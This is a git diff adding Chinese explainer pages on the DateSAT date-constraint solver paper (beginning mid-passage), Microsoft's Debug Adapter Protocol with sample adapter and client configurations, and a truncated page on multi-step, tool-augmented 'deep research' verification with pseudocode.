个月零 15 天"。 + +然后你可以写出约束,比如: + +``` +birthdate + Period(26, 0, 0) > today - Period(0, 0, 2) +(birthdate + Period(28, 0, 0)).year == today.year + 1 +``` + +求解器会自动告诉你:`today = Date(2026, 1, 1)`,`birthdate = Date(1999, 12, 31)` 是一组合法答案。 + +## 三、为什么日期计算这么难 + +让我用一个日常类比来说明。 + +**假设你在排班。** 你说"从 1 月 31 日开始,往后推一个月"。结果应该是哪天? + +- 直觉上可能是 2 月 28 日或 2 月 29 日(因为 2 月没有 31 号) +- 但不同的编程语言有不同的处理方式:有的舍到月底,有的推到 3 月 2 日,有的直接报错 + +DateSAT 采用的约定和主流库(Java、Python、JavaScript 的 Temporal)一致: + +> 先加年月,如果日期溢出就**向下取整**到当月最后一天;再加天数,溢出则进入下个月。 + +比如 `2017-12-30 + Period(2, 2, 1)` 的计算过程: + +1. 先加 2 年 2 个月 → 2020 年 2 月 30 日 +2. 2 月没有 30 号,向下取整 → 2020 年 2 月 29 日(2020 是闰年!) +3. 再加 1 天 → 2020 年 3 月 1 日 + +这里还隐藏了一个更深层的问题:**日期加法不满足交换律**。 + +``` +(2020-01-30 + 1 个月) + 1 天 = 2020-03-01 +(2020-01-30 + 1 天) + 1 个月 = 2020-02-29 +``` + +结果不一样!这意味着你不能随便调换日期运算的顺序——这也是很多 bug 的根源。 + +## 四、五种求解策略 + +DateSAT 的核心贡献是提出了五种将日期约束编码为整数算术的策略。它们都在做同一件事:**把日期变成整数,让 Z3 去解**。区别在于怎么变最高效。 + +### 策略一:朴素编码(Naive) + +把日期 `(y, m, d)` 的三个分量直接用三个整数变量表示。加一个月就写一堆 if-then-else 条件来判断月份会不会溢出。 + +问题在于:如果要加 100 天,就要嵌套 100 层 if-then-else。公式越来越深,求解器越来越慢。 + +### 策略二:纪元编码(Epoch-based) + +类似 Unix 时间戳,把日期转换成"从某个基准日起过了多少天"。加几天很简单——直接加数字就行。 + +但问题是:加几个月就不好算了。因为你得先知道当前日期在日历中的位置,才能算出"6 个月后是哪天"。 + +### 策略三:混合编码(Hybrid) + +结合前两种的优点:用纪元编码处理天数运算,用三元组编码处理年月运算。两者之间互相转换。 + +### 策略四:Alpha-Beta 编码 + +引入两个辅助变量 alpha 和 beta,分别表示"从某年起过了几个月"和"月中第几天"。这样加减月份就变成了简单的整数加减。 + +### 策略五:Alpha-Beta-Table(最佳) + +在策略四的基础上,预计算好每个月的累计天数表。查询的时候直接查表,不需要现场计算。这是论文中性能最好的策略,中位加速比达到 **2.41 倍**。 + +## 五、代码示例 + +### 示例 1:用 DateSAT 检查两段代码是否等价 + +下面这段 Python 代码来自论文。有两个函数都声称能判断"某个事件日期是否在基准日期的 18 个月窗口内"——但它们的实现方式不同。你能看出它们有 bug 吗? + +```python +# 方法一:手动计算 elapsed months +def is_in_same_18m_window_1(base_date, event_date): + if event_date < base_date: + return False + elapsed_m = (event_date.year - base_date.year) * 12 \ + + (event_date.month - base_date.month) + if event_date.day < base_date.day: + elapsed_m -= 1 + return elapsed_m < 18 + +# 方法二:用 dateutil 库 +def is_in_same_18m_window_2(base_date, event_date): + if event_date < base_date: + return False + window_end = base_date + relativedelta(months=18) + return event_date < window_end +``` + +这两个函数在随机测试中通过了上万次测试,但 DateSAT 在 **0.023 秒**内就找到了反例: + +- base_date = 2025-03-31 +- event_date = 2026-09-30 + +方法二错误地返回了 False。因为 2025-03-31 + 18 个月 = 2026-09-31,但 9 月没有 31 号,被舍入到了 9 月 30 日——这恰好等于 event_date,所以 `event_date < window_end` 为 False。 + +用 DateSAT 表达的约束如下: + +``` +base, event, window_end : Date +elapsed_m, elapsed_m_adj: int +result_1, result_2: bool + +base <= event + +elapsed_m == (event.year - base.year) * 12 + (event.month - base.month) +((event.day < base.day) -> (elapsed_m_adj == elapsed_m - 1)) +((event.day >= base.day) -> (elapsed_m_adj == elapsed_m)) +result_1 == (elapsed_m_adj < 18) + +window_end == base + Period(0, 18, 0) +result_2 == (event < window_end) + +result_1 != result_2 # 寻找反例! +``` + +求解器返回 SAT,说明确实存在反例。 + +### 示例 2:法律合规检查 + +美国税法中有这样的规定(IRC §338): + +> 收购方必须在收购发生之月之后的第 9 个月的 15 日之前做出 §338(g) 选举。 + +而"合格股票收购"的定义要求收购发生在"12 个月的收购期"内。 + +问题是:**一家公司在首次购买目标股票 500 天后,还能做出 §338(g) 选举吗?** + +主流 AI 模型(GPT-5.2、Gemini 3、Claude Sonnet 4.5)都回答了"No"——因为 500 天远超过大约 8.5 个月的期限。但正确答案是 **"Yes"**。 + +原因:首次购买可以在收购日前最多 12 个月发生。所以: + +- 首次购买:2024-01-12 +- 收购日:2024-12-21(在 12 个月窗口内) +- 选举截止日:2025-08-15(收购日后第 9 个月的 15 日) +- 选举日:2025-05-26(距离首次购买正好 500 天,且在截止日之前) + +用 DateSAT 表达的约束: + +``` +first_buy : Date +acq_date : Date +elec_ddl : Date +elec_date : Date + +acq_date >= first_buy +acq_date < first_buy + Period(0, 12, 0) + +elec_ddl.day == 15 +elec_ddl.year == (acq_date + Period(0, 8, 0)).year +elec_ddl.month == (acq_date + Period(0, 8, 0)).month + +elec_date <= elec_ddl +elec_date == first_buy + Period(0, 0, 500) +``` + +求解器找到了满足所有约束的赋值,证明了答案是"Yes"。 + +## 六、实验结果 + +论文构建了一个包含 450 个约束的基准测试集 DateSATBench,分为三类: + +| 来源 | 数量 | 求解成功率 | 中位耗时 | +|------|------|-----------|---------| +| LLM 合成 | 100 | ~87% | 0.10 秒 | +| 语法采样 | 150 | ~63% | 4.69 秒 | +| 法律文档挖掘 | 200 | ~97% | 0.13 秒 | + +关键发现: + +- 约束越复杂,编码策略的选择越重要 +- Alpha-Beta-Table 策略在复杂约束上表现最好 +- 平均而言,DateSAT 能在 1 分钟内解决超过 85% 的约束 + +## 七、为什么这件事很重要 + +DateSAT 的价值不在于解决脑筋急转弯,而在于它解决了一个长期被忽视的问题:**让形式化验证工具能够理解日期**。 + +现有的程序验证和符号执行工具(比如用于检查代码是否正确、合同条款是否合规的工具)都不原生支持日期运算。这意味着: + +1. 你无法用工具自动证明一段日期处理代码没有 bug +2. 你无法用符号执行来穷举日期相关的边界情况 +3. AI 模型在做法律文档分析时,对日期推理经常出错 + +DateSAT 填补了这个空白。它可以被集成到程序验证器中,也可以作为 AI 工具的"外部知识源"——就像本文展示的,当 Claude Sonnet 4.5 通过 MCP 协议调用 DateSAT 求解器时,它就给出了正确的答案。 + +开源地址:https://github.com/cmu-pasta/DateSAT + +## 八、小结 + +DateSAT 做的事情可以用一句话概括: + +> 把日期运算翻译成整数约束,让 SMT 求解器来帮你找答案。 + +它的核心洞察是:日期虽然看起来复杂(闰年、不同月份天数不同、不满足交换律),但本质上是可以被编码为数学公式的。一旦编码完成,现成的求解器就能高效地处理。 + +这就像给计算机装了一个"日期大脑"——它不会搞混 2 月有几号,也不会搞错闰年的规则。 + +## 九、思考题 + +1. 如果让你设计一个"日期除法"操作(比如"从 2024-03-15 往前推 3 个相等的时段"),你觉得会遇到什么困难? +2. DateSAT 只支持到 2100 年。如果要扩展到更远,会遇到什么新的挑战?(提示:格里高利历在每 100 年有一个例外——能被 100 整除但不能被 400 整除的年份不是闰年。) diff --git a/src/content/docs/papers/debug-adapter-protocol.md b/src/content/docs/papers/debug-adapter-protocol.md new file mode 100644 index 000000000..ccba555c1 --- /dev/null +++ b/src/content/docs/papers/debug-adapter-protocol.md @@ -0,0 +1,390 @@ +--- +title: Debug Adapter Protocol — 让编辑器共享同一套「调试遥控器」的通用协议 +来源: https://microsoft.github.io/debug-adapter-protocol/ +日期: 2026-06-13 +子分类: 编辑器与 IDE +分类: CLI +provenance: pipeline-v3 +--- + +## 是什么 + +**Debug Adapter Protocol(DAP,调试适配器协议)** 是 Microsoft 维护的一份开放规范(当前稳定版本 **1.71.0**),定义了**开发工具(客户端)** 与**调试后端(Debug Adapter)** 之间如何通过 **JSON 消息** 交换调试指令与状态。它与 2016 年发布的 **Language Server Protocol(LSP)** 是同一思路的姊妹协议:LSP 统一「补全/跳转/诊断」,DAP 统一「断点/单步/变量/调用栈」。 + +日常类比:你去不同品牌的电视(Sony、Samsung、小米),每台遥控器按键布局都不一样——换台、音量、输入源各有一套。DAP 相当于**通用红外遥控协议**:VS Code、Neovim、JetBrains、Zed 都是「万能遥控器外壳」,Python Debugger、Delve(Go)、lldb-vscode、Java Debug Adapter 都是「被控的电视机」。遥控器只发标准指令(下一步、暂停、设断点),电视机内部的芯片怎么解码由各家自己实现;**写一次 Debug Adapter,所有支持 DAP 的编辑器都能调试**。 + +技术定义:DAP 在 **Base Protocol**(带 `Content-Length` 头的帧格式,与 LSP 几乎相同)之上定义三类消息——**Request**(客户端 → 适配器,需回复)、**Response**(对 Request 的回复)、**Event**(适配器 → 客户端,异步通知,如 `stopped`、`terminated`)。规范不要求调试器原生支持 DAP;现实中几乎总是通过一个**中间层 Debug Adapter** 把 GDB、lldb、JDI、Delve API 等「方言」翻译成 DAP「普通话」。 + +## 为什么重要 + +不理解 DAP,下面这些事都没法解释: + +- 为什么 VS Code 里调试 Python、Go、Rust、Java 的 UI 长得几乎一样——底层都是同一套 DAP 客户端,不是每个语言重写一套调试面板 +- 为什么 Neovim 的 `nvim-dap` 能复用 VS Code 生态的 `debugpy`、`delve` 适配器——协议相同,只是客户端不同 +- 为什么新语言想接入主流 IDE,往往先写 **Debug Adapter** 而不是给每个编辑器写插件——适配器可跨工具复用 +- 为什么 DAP 刻意保持 **v1 永不破坏兼容**——靠 **Capabilities(能力标志)** 协商新特性,而不是升主版本号 + +## 架构一览 + +``` +┌─────────────────────────────────────────────────────────┐ +│ 开发工具(DAP Client / Host) │ +│ VS Code · Neovim+nvim-dap · Cursor · JetBrains · Zed │ +│ 通用调试 UI:断点栏、变量树、调用栈、调试控制台、线程列表 │ +└───────────────────────────┬─────────────────────────────┘ + │ JSON Request / Response / Event + │ 传输:stdio(常见)或 TCP socket +┌───────────────────────────▼─────────────────────────────┐ +│ Debug Adapter(中间层) │ +│ debugpy · delve/dap · lldb-vscode · Java Debug Adapter │ +│ 把 DAP 命令映射到具体调试器 API │ +└───────────────────────────┬─────────────────────────────┘ + │ 原生调试接口 +┌───────────────────────────▼─────────────────────────────┐ +│ 调试器 / Runtime │ +│ GDB · lldb · JVM JDWP · Python sys.settrace · Delve … │ +└─────────────────────────────────────────────────────────┘ +``` + +**关键设计选择**:标准化的是 **wire protocol(线上协议)**,不是 C++/Java 的 client library。适配器可以用最适合该调试器的语言实现(Python 写 `debugpy`、Go 写 Delve DAP、Node.js 写 `@vscode/debugadapter`)。 + +## 核心概念 + +### 1. Base Protocol(传输 + 帧格式) + +与 LSP 一样,每条消息由 **ASCII 报文头** + **UTF-8 JSON body** 组成: + +``` +Content-Length: 119\r\n +\r\n +{"seq":153,"type":"request","command":"next","arguments":{"threadId":3}} +``` + +| 字段 | 含义 | +|------|------| +| `Content-Length` | body 字节数(必填,目前唯一支持的 header) | +| `seq` | 单调递增序号,用于关联 request 与 response | +| `type` | `request` / `response` / `event` | + +三种消息形态: + +| 类型 | 方向 | 需要回复? | 典型例子 | +|------|------|------------|----------| +| Request | Client → Adapter | 是 | `initialize`, `launch`, `setBreakpoints`, `next` | +| Response | Adapter → Client | — | `InitializeResponse`, `SetBreakpointsResponse` | +| Event | Adapter → Client | 否 | `stopped`, `initialized`, `terminated`, `output` | + +### 2. Capabilities(能力协商) + +DAP 自诞生起一直是 **protocol version 1**,新功能通过 **capabilities 标志** 扩展,而不是 bump 主版本。会话开始时 Client 发 `initialize` request,双方交换各自支持的能力: + +- Client 侧:`supportsRunInTerminalRequest`、`supportsVariablePaging` 等(前缀常为 `supports`) +- Adapter 侧:`supportsConditionalBreakpoints`、`supportsEvaluateForHovers`、`supportsStepBack` 等 + +**规则**:某个 capability 字段**不存在** = 不支持;不必显式返回 `false`。 + +### 3. 会话生命周期(Launch Sequencing) + +一次完整调试会话的典型顺序(规范强制部分步骤的先后关系): + +``` +Client Debug Adapter + | | + |-------- initialize -------------->| + |<------- InitializeResponse -------| (交换 capabilities) + | | + |-------- launch / attach --------->| (启动或附着被调试程序) + | | + |<------- initialized event --------| (适配器:可以收断点配置了) + |-------- setBreakpoints ---------->| + |-------- setExceptionBreakpoints ->| + |-------- configurationDone ------->| + |<------- launch/attach Response ----| (此时程序真正跑起来) + | | + |<------- stopped event ------------| (命中断点 / 异常 / 用户暂停) + |-------- threads ----------------->| + |-------- stackTrace -------------->| + |-------- scopes ------------------>| + |-------- variables --------------->| + | | + |-------- continue / next --------->| + | | + |-------- disconnect / terminate -->| + |<------- terminated event ---------| +``` + +两种启动模式: + +| 模式 | 谁启动被调试程序 | 典型 Request | +|------|------------------|--------------| +| **launch** | Debug Adapter 负责拉起进程 | `launch` + `program`/`args` 等(由扩展 schema 定义,规范不固定字段) | +| **attach** | 用户先手动启动,Adapter 附着 | `attach` + `processId` 等 | + +**configurationDone** 是容易忽略的关键点:在 Adapter 发出 `initialized` event 之前,Client 不应发送断点配置;配置序列结束后发 `configurationDone`,Adapter 才应完成 `launch`/`attach` 的响应。 + +### 4. 停止态与对象引用(Object References) + +程序暂停时,Client 按「瀑布」拉取调试状态: + +``` +threads → stackTrace → scopes → variables → variables(递归子字段) +``` + +`scopes`、`variables` 等复杂结构不直接嵌在父对象里,而是通过 **`variablesReference`(正整数句柄)** 延迟获取。规范约定: + +- 与**当前暂停态**绑定的引用(栈帧、作用域变量)在 **continue 之后失效**;Adapter 可在恢复执行时把引用计数器重置为 1 +- `evaluate`、调试控制台 `output` 事件里的变量引用应尽可能**跨暂停态保留**,方便用户事后检查 + +`threadId` 等标识符**没有**这种短生命周期限制,否则 `pause` 请求无法作用于运行中的线程。 + +### 5. 断点语义 + +`setBreakpoints` 对**单个源文件**发送**全量**断点列表(非增量)。Adapter 通常实现为:清空该文件旧断点 → 设置 request 中的新列表 → 在 response 里返回**实际生效**的断点(位置可能被调试器微调)。 + +若暂时无法验证断点,应设 `verified: false`;之后状态变化用 **`breakpoint` event** 通知 Client 更新 UI。 + +### 6. 连接模式 + +| 模式 | 说明 | +|------|------| +| **Single Session** | Client 把 Adapter 当子进程拉起,经 **stdin/stdout** 通信;会话结束终止进程;多会话 = 多个 Adapter 进程 | +| **Multi Session** | Adapter 常驻监听端口;每个调试会话建立独立 TCP 连接 | + +Adapter 如何被启动**不在** DAP 规范内,由各工具的 `launch.json` / `dap.configurations` 等扩展机制约定。 + +## 代码示例 + +### 示例 1:手工构造一条 DAP `setBreakpoints` 消息 + +下面展示 Base Protocol 帧 + JSON body,等价于在 `main.go` 第 10 行设一个断点(Go 适配器常见场景): + +```text +Content-Length: 287 + +{ + "seq": 4, + "type": "request", + "command": "setBreakpoints", + "arguments": { + "source": { + "path": "/home/dev/project/main.go", + "name": "main.go" + }, + "lines": [10], + "breakpoints": [ + { + "line": 10, + "condition": "err != nil" + } + ], + "sourceModified": false + } +} +``` + +Adapter 的 `SetBreakpointsResponse` 可能返回: + +```json +{ + "seq": 5, + "type": "response", + "request_seq": 4, + "success": true, + "command": "setBreakpoints", + "body": { + "breakpoints": [ + { + "id": 1, + "verified": true, + "line": 10, + "message": "" + } + ] + } +} +``` + +若第 10 行不可设断点(如无调试信息),则 `verified: false`,`message` 解释原因。 + +### 示例 2:用 Node.js `@vscode/debugadapter` 实现最小适配器骨架 + +Microsoft 官方提供多语言 SDK。Node.js 侧可用 `DebugSession` 子类快速搭一个「回声」适配器,演示 Request/Event 处理: + +```typescript +import { + DebugSession, + InitializedEvent, + TerminatedEvent, + StoppedEvent, + OutputEvent, + Thread, +} from '@vscode/debugadapter'; + +class MinimalDebugSession extends DebugSession { + private static threadId = 1; + + protected initializeRequest( + response: DebugProtocol.InitializeResponse, + args: DebugProtocol.InitializeRequestArguments + ): void { + response.body = response.body || {}; + response.body.supportsConfigurationDoneRequest = true; + response.body.supportsEvaluateForHovers = true; + this.sendResponse(response); + this.sendEvent(new InitializedEvent()); + } + + protected configurationDoneRequest( + response: DebugProtocol.ConfigurationDoneResponse + ): void { + this.sendResponse(response); + } + + protected launchRequest( + response: DebugProtocol.LaunchResponse, + args: DebugProtocol.LaunchRequestArguments + ): void { + this.sendResponse(response); + this.sendEvent(new OutputEvent('Program started\n', 'stdout')); + // 模拟立即在入口停住 + this.sendEvent( + new StoppedEvent('entry', MinimalDebugSession.threadId) + ); + } + + protected threadsRequest(response: DebugProtocol.ThreadsResponse): void { + response.body = { + threads: [new Thread(MinimalDebugSession.threadId, 'main')], + }; + this.sendResponse(response); + } + + protected disconnectRequest( + response: DebugProtocol.DisconnectResponse, + args: DebugProtocol.DisconnectArguments + ): void { + this.sendResponse(response); + this.sendEvent(new TerminatedEvent()); + } +} + +MinimalDebugSession.run(MinimalDebugSession); +``` + +配合 VS Code `launch.json`: + +```json +{ + "version": "0.2.0", + "configurations": [ + { + "type": "minimal", + "request": "launch", + "name": "Launch Minimal Adapter", + "program": "${workspaceFolder}/dummy" + } + ] +} +``` + +`type: "minimal"` 由扩展注册,指向上述 Adapter 可执行文件;Client 仍按标准顺序发 `initialize` → `launch` → 等 `initialized` → `configurationDone`。 + +### 示例 3:Neovim `nvim-dap` 客户端配置(消费方视角) + +作为 DAP Client,Neovim 不实现调试器,只发标准 Request。调试 Go 时典型配置: + +```lua +local dap = require('dap') + +dap.adapters.delve = { + type = 'server', + port = '${port}', + executable = { + command = 'dlv', + args = { 'dap', '--listen', '127.0.0.1:${port}', '--log', '--log-output=dap' }, + }, +} + +dap.configurations.go = { + { + type = 'delve', + name = 'Debug main', + request = 'launch', + program = '${workspaceFolder}', + dlvLoadConfig = { + followPointers = true, + maxVariableRecurse = 1, + maxStringLen = 64, + maxArrayValues = 64, + maxStructFields = -1, + }, + }, +} +``` + +用户在 Neovim 里按 F5,`nvim-dap` 在后台完成:`initialize` → `launch` → 断点同步 → `continue` → 处理 `stopped` event → 拉 `stackTrace`/`variables`。**同一份 Delve DAP 适配器**也可被 VS Code Go 扩展使用。 + +## 与 LSP 的对比 + +| 维度 | LSP | DAP | +|------|-----|-----| +| 解决的问题 | 编辑期「语言智能」 | 运行期「交互式调试」 | +| 消息载体 | JSON-RPC 2.0(`method`/`id`) | 自定义 JSON(`command`/`seq`) | +| 传输帧 | `Content-Length` + JSON | 相同 | +| 中间层名称 | Language Server | Debug Adapter | +| 版本策略 | 显式 LSP 3.x 版本 | 永久 v1 + capabilities 标志 | +| 典型 Client | 编辑器代码补全 | 断点、单步、变量、REPL | + +两者常成对出现:Rust 用 `rust-analyzer`(LSP)+ `lldb-vscode`/`codelldb`(DAP);Python 用 Pylance/Pyright(LSP)+ `debugpy`(DAP)。 + +## 常见 Request / Event 速查 + +| 名称 | 类型 | 作用 | +|------|------|------| +| `initialize` | Request | 交换 capabilities,会话第一步 | +| `launch` / `attach` | Request | 启动或附着被调试程序 | +| `configurationDone` | Request | 告诉 Adapter 断点配置已发完 | +| `setBreakpoints` | Request | 某源文件的全量断点 | +| `continue` / `next` / `stepIn` / `stepOut` | Request | 执行控制 | +| `threads` / `stackTrace` / `scopes` / `variables` | Request | 暂停态信息瀑布 | +| `evaluate` | Request | 调试控制台求值 / hover | +| `disconnect` / `terminate` | Request | 结束会话(attach vs launch 语义不同) | +| `initialized` | Event | Adapter 准备好接收断点配置 | +| `stopped` | Event | 程序暂停,带 `reason`(breakpoint、exception、pause…) | +| `output` | Event | 被调试程序 stdout/stderr 到调试控制台 | +| `terminated` | Event | 调试会话结束 | + +## 实现与生态 + +规范页列出了大量现成适配器:**debugpy**(Python)、**Delve DAP**(Go)、**Java Debug Adapter**、**lldb-vscode**、**Mono/Debugger**、**perl-debug-adapter** 等。SDK 包括: + +- **Node.js**:[`@vscode/debugadapter`](https://www.npmjs.com/package/@vscode/debugadapter) + [`@vscode/debugadapter-testsupport`](https://www.npmjs.com/package/@vscode/debugadapter-testsupport) +- **Java**:[Eclipse LSP4J Debug](https://github.com/eclipse-lsp4j/lsp4j) 等 +- **测试**:官方 [debug adapter test suite](https://github.com/microsoft/debug-adapter-protocol/tree/main/test-suite) 可验证适配器合规性 + +若你要为新语言添加调试支持,推荐路径: + +1. 先用现有 CLI 调试器验证能设断点、单步、看变量 +2. 实现薄层 Debug Adapter,优先支持 `initialize`、`launch`、`setBreakpoints`、`configurationDone`、`continue`、`threads`、`stackTrace`、`scopes`、`variables`、`stopped`/`terminated` +3. 用 VS Code 或 `nvim-dap` 做手工测试,再跑官方 test suite +4. 按需声明 capabilities,逐步加条件断点、`evaluate`、多线程、`runInTerminal` 等 + +## 常见误区 + +1. **把 DAP 当成调试器本身** — DAP 只是 UI 与调试后端之间的协议;GDB、lldb、JDWP 才是实际执行调试的机制 +2. **在 `initialized` 之前发 `setBreakpoints`** — 违反时序,部分 Adapter 会丢断点或行为未定义 +3. **假设 `variablesReference` 跨 continue 仍有效** — 暂停态引用在恢复执行后失效,Client 必须重新拉取 +4. **认为 `launch` 的参数由规范统一** — `program`、`cwd`、`env` 等由各家 Adapter 的 JSON Schema 定义(通常通过 VS Code `contributes.debuggers` 贡献) +5. **忽略 `verified: false` 断点** — UI 应明确提示灰显断点,而不是假装已生效 + +## 延伸阅读 + +- [DAP 官方规范 1.71.0](https://microsoft.github.io/debug-adapter-protocol/specification) — 全部 Request/Event 的 JSON Schema +- [Overview(架构与生命周期)](https://microsoft.github.io/debug-adapter-protocol/overview) — 官方序列图与对象生命周期说明 +- [Language Server Protocol 笔记](./language-server-protocol-spec.md) — 姊妹协议,对比阅读效果更好 +- [VS Code Debugger Extension 指南](https://code.visualstudio.com/api/extension-guides/debugger-extension) — 如何注册 `type`、写 `launch.json` schema、打包 Adapter +- [nvim-dap 文档](https://github.com/mfussenegger/nvim-dap) — 非 VS Code 客户端实现参考 + +--- + +**一句话总结**:DAP 是编辑器和调试器之间的「通用遥控协议」——编辑器只实现一次调试 UI,调试器通过 Adapter 说同一种 JSON 语言;理解 **capabilities 协商**、**launch 时序** 和 **暂停态对象引用**,就掌握了现代 IDE 调试体验的核心骨架。 diff --git a/src/content/docs/papers/deep-research-harness-2026.md b/src/content/docs/papers/deep-research-harness-2026.md new file mode 100644 index 000000000..4649a8ad2 --- /dev/null +++ b/src/content/docs/papers/deep-research-harness-2026.md @@ -0,0 +1,254 @@ +--- +title: "Deep Research as Tool-Augmented Multi-Step Verification" +来源: https://arxiv.org/abs/2605.31102 +日期: 2026-06-13 +分类: 机器学习 +子分类: 模型与训练 +provenance: pipeline-v3 +--- + +# Deep Research as Tool-Augmented Multi-Step Verification + +## 一、一句话理解 + +Deep Research = 让 AI 像侦探一样,不靠"猜",而靠"反复查证"来回答问题。 + +## 二、日常类比:做菜 vs. 做研究 + +想象你要做一道从没做过的菜: + +**传统 AI(像聊天机器人)的做法:** +- 你问:"怎么做提拉米苏?" +- AI 凭记忆直接给你配方 +- 如果它的记忆有误(比如忘了加马斯卡彭奶酪),你就得到一道失败品 + +**Deep Research 的做法:** +- 你先让 AI 去查 3 本权威食谱网站 +- 再让它对比这 3 份配方的差异 +- 然后去论坛看真实食客的反馈 +- 最后综合所有信息,给出一个经过交叉验证的答案 + +关键区别:**不是一次性生成答案,而是多步、多源、反复验证。** + +## 三、核心概念拆解 + +### 3.1 什么是 "Tool-Augmented"(工具增强) + +LLM(大语言模型)本身像一个"博学的书呆子"——它读过很多书,但不会动手。 + +Tool-Augmented 就是给它配上工具: + +| 工具 | 类比 | 作用 | +|------|------|------| +| 搜索引擎 | 翻字典 | 获取最新信息 | +| 代码执行器 | 计算器 | 精确计算、数据处理 | +| 数据库查询 | 查档案 | 获取结构化数据 | +| 浏览器 | 逛图书馆 | 访问网页、提取内容 | + +没有工具的 LLM:靠内部记忆回答(可能过时、可能编造) +有工具的 LLM:实时去"外面"查证(更准确、可追溯) + +### 3.2 什么是 "Multi-Step Verification"(多步验证) + +这是整个方法的核心。传统 AI 的回答流程是: + +``` +用户提问 → LLM 生成答案 → 结束 +``` + +Deep Research 的流程是: + +``` +用户提问 + → Step 1: 分解问题(拆成子问题) + → Step 2: 对每个子问题选择工具并执行 + → Step 3: 收集结果,评估质量 + → Step 4: 发现矛盾或缺口?回到 Step 2 补查 + → Step 5: 交叉验证不同来源的信息 + → Step 6: 生成最终答案 + 引用来源 +``` + +每一步都可以被检查、被质疑、被修正。这就是"多步验证"。 + +## 四、为什么需要多步验证? + +LLM 有一个著名的问题叫 **幻觉(Hallucination)**——它会一本正经地胡说八道。 + +举个真实的例子: + +> 问:"2024 年奥运会金牌榜第一名是哪个国家?" +> +> 没有验证的 LLM 可能回答:"美国,因为它是体育强国。" +> (实际上美国确实是第一,但这是猜的,不是查的) +> +> 经过验证的 LLM 会: +> 1. 用搜索引擎查 IOC 官网 +> 2. 用代码执行器统计各国家金牌数 +> 3. 交叉比对维基百科数据 +> 4. 确认一致后给出答案 + 引用 + +多步验证的本质:**用工具的输出替代模型的猜测。** + +## 五、代码示例 + +### 示例 1:简单的事实验证流程 + +下面是一个简化的伪代码,展示"单步工具调用 + 验证"的逻辑: + +```python +# ============================================================ +# 示例 1:事实验证 —— 用工具查数据,而不是靠模型猜 +# ============================================================ + +def verify_fact(question, tools): + """ + 基本验证流程: + - 根据问题选择工具 + - 执行查询 + - 返回带来源的答案 + """ + + # 第一步:分析问题需要什么类型的工具 + tool_choice = select_tool(question, tools) + # 例如:如果问题是"XX 公司的 CEO 是谁" → 选搜索引擎 + + # 第二步:执行工具调用 + raw_result = tool_choice.execute(question) + # 例如:搜索引擎返回多个网页片段 + + # 第三步:提取关键信息 + extracted_info = extract_facts(raw_result) + # 例如:从搜索结果中提取"CEO = Sam Altman" + + # 第四步:交叉验证 —— 用第二个工具确认 + if len(extracted_info) > 0: + confirmation = tools["secondary_source"].execute( + extracted_info.key_entity + ) + is_consistent = check_consistency(extracted_info, confirmation) + else: + is_consistent = False + + # 第五步:生成最终答案 + if is_consistent: + return { + "answer": extracted_info.claim, + "confidence": "high", + "sources": [raw_result.source, confirmation.source] + } + else: + return { + "answer": "无法确认,信息存在矛盾", + "confidence": "low", + "sources": [] + } +``` + +**逐行解释:** + +第 10 行的 `select_tool` 就像你决定"这个问题该查字典还是该上网搜"。不同的问题适合不同的工具。 + +第 14 行的 `execute` 是真正干活的地方——它不是让 LLM 回忆,而是真的去执行一次搜索或查询。 + +第 24-28 行的交叉验证是关键:用一个独立来源去确认第一个来源的结果。两个来源都说一样的话,可信度就高。 + +### 示例 2:多步递归验证 + +对于复杂问题,可能需要反复查证。下面展示"多步验证循环": + +```python +# ============================================================ +# 示例 2:多步递归验证 —— 发现矛盾时自动补查 +# ============================================================ + +def deep_research(question, max_steps=5): + """ + 深度研究循环: + - 分解问题为子任务 + - 对每个子任务执行工具调用 + - 如果证据不足或有矛盾,自动追加查询 + - 达到最大步数或证据充分时停止 + """ + + # 初始状态:只有一个待验证的问题 + evidence_graph = EvidenceGraph() + pending_queries = [question] + step = 0 + + while pending_queries and step < max_steps: + # 取出一个待验证的子问题 + current_query = pending_queries.pop(0) + + # 执行工具调用获取证据 + results = execute_research_cycle(current_query) + # 返回: [{claim, source, confidence}, ...] + + # 将结果加入证据图 + evidence_graph.add_results(results) + + # 检查是否有矛盾或证据不足的节点 + contradictions = evidence_graph.find_contradictions() + gaps = evidence_graph.find_gaps() + + # 如果有矛盾或空白,生成新的子查询继续验证 + for contradiction in contradictions: + # 针对矛盾点生成"仲裁查询" + arbiter_query = generate_arbiter_query(contradiction) + pending_queries.append(arbiter_query) + + for gap in gaps: + # 针对空白生成"补充查询" + follow_up_query = generate_follow_up_query(gap) + pending_queries.append(follow_up_query) + + step += 1 + + # 所有查询耗尽或达到上限,生成最终报告 + return evidence_graph.generate_report() +``` + +**关键逻辑解释:** + +第 20 行的 `EvidenceGraph` 像一个知识图谱,记录所有找到的证据及其来源。你可以把它想象成一个白板,上面贴着所有查到的资料,用不同颜色的便签标注"已确认"或"有矛盾"。 + +第 30-35 行的 `find_contradictions` 和 `find_gaps` 是智能判断部分:它会分析当前证据,找出哪些地方说法不一、哪些地方缺少支撑。 + +第 38-46 行是"自动补查"机制:一旦发现矛盾或空白,系统会自动生成新的查询去解决这些问题,而不需要人工干预。这就是为什么叫"多步"——它不是走一步算一步,而是自己决定下一步怎么走。 + +## 六、与传统 RAG 的区别 + +很多人会把 Deep Research 和 RAG(检索增强生成)混淆。它们有关系,但不一样: + +| 维度 | RAG | Deep Research | +|------|-----|---------------| +| 检索次数 | 通常一次 | 多次、迭代 | +| 验证机制 | 无 | 有,交叉验证 | +| 矛盾处理 | 不处理 | 自动生成仲裁查询 | +| 输出形式 | 一段文字 | 带证据链的报告 | +| 适用场景 | 简单问答 | 复杂研究任务 | + +简单说:**RAG 是一次性"查一下再答",Deep Research 是"查了再查,查到满意为止"。** + +## 七、实际应用场景 + +1. **学术文献综述**:自动搜索论文、提取结论、对比不同研究的发现 +2. **投资尽职调查**:交叉验证公司财务数据、行业趋势、竞争对手信息 +3. **新闻事实核查**:对热点事件的多源报道进行交叉比对 +4. **法律案例研究**:检索相关判例、法规,验证法律推理的完整性 + +## 八、学习要点回顾 + +1. **Tool-Augmented** = LLM 不再是"闭门造车",而是用工具实时获取信息 +2. **Multi-Step Verification** = 答案不是一次生成的,而是通过多轮查询、交叉验证逐步构建的 +3. **核心优势** = 减少幻觉、提高准确性、提供可追溯的证据链 +4. **与 RAG 的关系** = Deep Research 是 RAG 的进阶版,多了迭代验证和矛盾处理 + +## 九、延伸思考 + +当你下次使用 AI 助手时,可以观察它的回答: + +- 它是一次性给出的答案,还是经过了某种验证? +- 它引用了信息来源吗? +- 如果它说的内容和你知道的不一样,你能判断哪个更可信吗? + +Deep Research 的目标,就是让 AI 